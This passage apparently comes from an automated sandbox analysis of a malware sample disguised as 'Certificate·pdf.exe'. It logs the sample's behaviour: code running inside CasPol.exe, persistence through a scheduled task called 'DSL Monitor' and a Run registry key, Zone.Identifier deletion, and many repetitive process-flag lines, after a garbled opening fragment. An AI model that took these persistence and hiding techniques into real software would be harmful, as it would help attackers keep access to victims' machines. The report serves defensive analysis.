T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4FJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_04590F4A push 846A6749h; ret 5_2_04590F4F
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_217B0E32 push 217B0FA4h; retn 0020h5_2_217B0E3C
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_217B0D8A push 217B0FA4h; retn 0024h5_2_217B0D94
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23BD0973 push ss; ret 5_2_23BD0974

      Boot Survival

      barindex
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
